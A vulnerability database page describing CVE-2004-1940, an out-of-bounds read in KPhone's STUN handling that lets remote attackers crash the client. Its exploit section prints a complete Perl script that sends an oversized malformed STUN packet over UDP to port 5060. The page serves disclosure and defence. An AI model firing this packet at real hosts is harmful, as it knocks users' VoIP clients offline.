CVE-2004-1940 : Detail

CVE-2004-1940

Overflow
0.95%V3
Network
2005-05-10 02:00 +00:00
2017-07-10 12:57 +00:00

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

sipclient.cpp in KPhone 4.0.1 and earlier allows remote attackers to cause a denial of service (crash) via a STUN response packet with a large attrLen value that causes an out-of-bounds read.

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-125 Out-of-bounds Read
The product reads data past the end, or before the beginning, of the intended buffer.

Metrics

Metric Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 24011

Publication date : 2004-04-07 22:00 +00:00
Author : storm
EDB Verified : Yes

source: https://www.securityfocus.com/bid/10159/info A denial of service vulnerability has been reported in KPhone. This issue may be triggered by a malformed SIP (Session Initiation Protocol) STUN message. This is due to insufficient validation of user-specified STUN packet attribute lengths, causing an out of bounds read and subsequent crash. It is not known if this condition could be further exploited to execute arbitrary code, though it has been conjectured that it is not exploitable. #!/usr/bin/perl use IO::Socket::INET; my $buf = join("", "\x01\x01", # BindingResponse "\x00\x01", # MsgLength "A"x16, # GUID "\x00\x00", # Attribute "\x08\x01", # AttrLength "A"x7975 # Value ); my $remote = IO::Socket::INET->new( Proto => 'udp', PeerAddr => '192.168.1.49', PeerPort => 5060); print $remote $buf;

Products Mentioned

Configuraton 0

Wirlab>>Kphone >> Version To (including) 4.0.1

References

http://marc.info/?l=bugtraq&m=108244325924859&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/10159
Tags : vdb-entry, x_refsource_BID
Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.